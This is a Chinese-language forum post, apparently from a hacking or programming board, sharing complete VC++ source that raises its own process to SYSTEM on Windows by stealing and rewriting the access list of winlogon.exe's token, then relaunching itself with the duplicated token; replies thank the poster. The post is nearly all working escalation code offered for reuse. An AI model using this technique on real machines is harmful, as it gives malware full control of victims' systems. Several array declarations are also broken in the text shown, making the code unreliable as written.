VC++ 提升自身权限为system
#include "stdafx.h"#include <windows.h>
#include <tlhelp32.h>
#include <Psapi.h>
#pragma comment(lib,"Psapi.lib")
#include "Shellapi.h"
#include <TLHELP32.H>
#include <aclapi.h>
int ProcessExit(LPCTSTR szProcName,int x)
{
PROCESSENTRY32 pe;
DWORD dwRet;
BOOL bFound = FALSE;
HANDLE hProcess;
char fileName = {0};
HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSP)
{
pe.dwSize = sizeof(pe);
for (dwRet = Process32First(hSP, &pe);
dwRet;
dwRet = Process32Next(hSP, &pe))
{
if(x){
if (lstrcmpi( szProcName, pe.szExeFile) == 0)
{
bFound = TRUE;
break;
}
}
else
{
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,FALSE,pe.th32ProcessID);
if(hProcess)
{
Sleep(1);
GetModuleFileNameEx(hProcess,NULL, (LPSTR)fileName,sizeof(fileName));
Sleep(1);
if (lstrcmpi( szProcName, fileName) == 0)
{
bFound = TRUE;
break;
}
}
CloseHandle(hProcess);
}
}
CloseHandle(hSP);
}
return bFound;
}
typedef HANDLE (WINAPI *CreateMutexAT)
(
__in_opt LPSECURITY_ATTRIBUTES lpMutexAttributes,
__in BOOL bInitialOwner,
__in_opt LPCSTR lpName
);
BOOL
EnableDebugPriv( LPCTSTR szPrivilege )
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if ( !OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
&hToken ) )
{
return FALSE;
}
if ( !LookupPrivilegeValue( NULL, szPrivilege, &sedebugnameValue ) )
{
CloseHandle( hToken );
return FALSE;
}
tkp.PrivilegeCount = 1;
tkp.Privileges.Luid = sedebugnameValue;
tkp.Privileges.Attributes = SE_PRIVILEGE_ENABLED;
if ( !AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
{
CloseHandle( hToken );
return FALSE;
}
return TRUE;
}
DWORD
GetProcessId( LPCTSTR szProcName )
{
PROCESSENTRY32 pe;
DWORD dwPid;
DWORD dwRet;
BOOL bFound = FALSE;
//
// 通过 TOOHLP32 函数枚举进程
//
HANDLE hSP = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if ( hSP )
{
pe.dwSize = sizeof( pe );
for ( dwRet = Process32First( hSP, &pe );
dwRet;
dwRet = Process32Next( hSP, &pe ) )
{
//
// 使用 StrCmpNI 比较字符传,可忽略大小写
//
if ( lstrcmpi(szProcName, pe.szExeFile) == 0 )
{
dwPid = pe.th32ProcessID;
bFound = TRUE;
break;
}
}
CloseHandle( hSP );
if ( bFound == TRUE )
{
return dwPid;
}
}
return NULL;
}
BOOL CreateSystemProcess( LPTSTR szProcessName )
{
HANDLE hProcess;
HANDLE hToken, hNewToken;
DWORD dwPid;
PACL pOldDAcl = NULL;
PACL pNewDAcl = NULL;
BOOL bDAcl;
BOOL bDefDAcl;
DWORD dwRet;
PACL pSacl = NULL;
PSID pSidOwner = NULL;
PSID pSidPrimary = NULL;
DWORD dwAclSize = 0;
DWORD dwSaclSize = 0;
DWORD dwSidOwnLen = 0;
DWORD dwSidPrimLen = 0;
DWORD dwSDLen;
EXPLICIT_ACCESS ea;
PSECURITY_DESCRIPTOR pOrigSd = NULL;
PSECURITY_DESCRIPTOR pNewSd = NULL;
STARTUPINFO si;
PROCESS_INFORMATION pi;
BOOL bError;
if (!EnableDebugPriv("SeDebugPrivilege"))
{
bError = TRUE;
goto Cleanup;
}
if ( ( dwPid = GetProcessId("WINLOGON.EXE") ) == NULL )
{
bError = TRUE;
goto Cleanup;
}
hProcess = OpenProcess( MAXIMUM_ALLOWED, FALSE, dwPid );
if ( hProcess == NULL )
{
bError = TRUE;
goto Cleanup;
}
if ( !OpenProcessToken( hProcess, READ_CONTROL | WRITE_DAC, &hToken ) )
{
bError = TRUE;
goto Cleanup;
}
ZeroMemory( &ea, sizeof( EXPLICIT_ACCESS ) );
BuildExplicitAccessWithName( &ea,
"Everyone",
TOKEN_ALL_ACCESS,
GRANT_ACCESS,
0 );
if ( !GetKernelObjectSecurity( hToken,
DACL_SECURITY_INFORMATION,
pOrigSd,
0,
&dwSDLen ) )
{
if ( GetLastError() == ERROR_INSUFFICIENT_BUFFER )
{
pOrigSd = ( PSECURITY_DESCRIPTOR ) HeapAlloc( GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwSDLen );
if ( pOrigSd == NULL )
{
bError = TRUE;
goto Cleanup;
}
if ( !GetKernelObjectSecurity( hToken,
DACL_SECURITY_INFORMATION,
pOrigSd,
dwSDLen,
&dwSDLen ) )
{
bError = TRUE;
goto Cleanup;
}
}
else
{
bError = TRUE;
goto Cleanup;
}
}
if ( !GetSecurityDescriptorDacl( pOrigSd, &bDAcl, &pOldDAcl, &bDefDAcl ) )
{
bError = TRUE;
goto Cleanup;
}
dwRet = SetEntriesInAcl( 1, &ea, pOldDAcl, &pNewDAcl );
if ( dwRet != ERROR_SUCCESS )
{
pNewDAcl = NULL;
bError = TRUE;
goto Cleanup;
}
if ( !MakeAbsoluteSD( pOrigSd,
pNewSd,
&dwSDLen,
pOldDAcl,
&dwAclSize,
pSacl,
&dwSaclSize,
pSidOwner,
&dwSidOwnLen,
pSidPrimary,
&dwSidPrimLen ) )
{
if ( GetLastError() == ERROR_INSUFFICIENT_BUFFER )
{
pOldDAcl = ( PACL ) HeapAlloc( GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwAclSize );
pSacl = ( PACL ) HeapAlloc( GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwSaclSize );
pSidOwner = ( PSID ) HeapAlloc( GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwSidOwnLen );
pSidPrimary = ( PSID ) HeapAlloc( GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwSidPrimLen );
pNewSd = ( PSECURITY_DESCRIPTOR ) HeapAlloc( GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwSDLen );
if ( pOldDAcl == NULL ||
pSacl == NULL ||
pSidOwner == NULL ||
pSidPrimary == NULL ||
pNewSd == NULL )
{
bError = TRUE;
goto Cleanup;
}
//
// 再次调用才可以成功创建新的安全描述符 pNewSd
// 但新的安全描述符仍然是原访问控制列表 ACL
//
if ( !MakeAbsoluteSD( pOrigSd,
pNewSd,
&dwSDLen,
pOldDAcl,
&dwAclSize,
pSacl,
&dwSaclSize,
pSidOwner,
&dwSidOwnLen,
pSidPrimary,
&dwSidPrimLen ) )
{
bError = TRUE;
goto Cleanup;
}
}
else
{
bError = TRUE;
goto Cleanup;
}
}
if ( !SetSecurityDescriptorDacl( pNewSd, bDAcl, pNewDAcl, bDefDAcl ) )
{
bError = TRUE;
goto Cleanup;
}
if ( !SetKernelObjectSecurity( hToken, DACL_SECURITY_INFORMATION, pNewSd ) )
{
bError = TRUE;
goto Cleanup;
}
if ( !OpenProcessToken( hProcess, TOKEN_ALL_ACCESS, &hToken ) )
{
bError = TRUE;
goto Cleanup;
}
if ( !DuplicateTokenEx( hToken,
TOKEN_ALL_ACCESS,
NULL,
SecurityImpersonation,
TokenPrimary,
&hNewToken ) )
{
bError = TRUE;
goto Cleanup;
}
ZeroMemory( &si, sizeof( STARTUPINFO ) );
si.cb = sizeof( STARTUPINFO );
ImpersonateLoggedOnUser( hNewToken );
if ( !CreateProcessAsUser( hNewToken,
NULL,
szProcessName,
NULL,
NULL,
FALSE,
NULL, //NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE,
NULL,
NULL,
&si,
&pi ) )
{
bError = TRUE;
goto Cleanup;
}
bError = FALSE;
Cleanup:
if ( pOrigSd )
{
HeapFree( GetProcessHeap(), 0, pOrigSd );
}
if ( pNewSd )
{
HeapFree( GetProcessHeap(), 0, pNewSd );
}
if ( pSidPrimary )
{
HeapFree( GetProcessHeap(), 0, pSidPrimary );
}
if ( pSidOwner )
{
HeapFree( GetProcessHeap(), 0, pSidOwner );
}
if ( pSacl )
{
HeapFree( GetProcessHeap(), 0, pSacl );
}
if ( pOldDAcl )
{
HeapFree( GetProcessHeap(), 0, pOldDAcl );
}
CloseHandle( pi.hProcess );
CloseHandle( pi.hThread );
CloseHandle( hToken );
CloseHandle( hNewToken );
CloseHandle( hProcess );
if ( bError )
{
return FALSE;
}
return TRUE;
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
char strInstallModule;
memset(strInstallModule, 0, sizeof(strInstallModule));
GetModuleFileName(NULL,strInstallModule,sizeof(strInstallModule));
CreateSystemProcess(strInstallModule);
Sleep(1000);
return 0;
}
以上是提升自身权限为system
完整代码 可以提升自己为system 想钱钱的疯子!!! 多谢分享! 谢谢分享!{:5_193:}
页:
[1]